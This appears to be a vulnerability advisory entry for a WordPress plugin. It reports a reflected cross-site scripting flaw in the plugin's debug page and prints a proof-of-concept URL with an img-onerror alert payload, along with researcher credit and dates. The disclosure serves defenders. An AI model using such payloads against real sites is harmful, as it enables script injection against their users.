The plugins do not sanitise and escape query parameters before outputting them back in the debug page, leading to a Reflected Cross-Site Scripting issue
https://example.com/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-17 (about 1 years ago)
2022-01-17 (about 1 years ago)
2022-04-12 (about 9 months ago)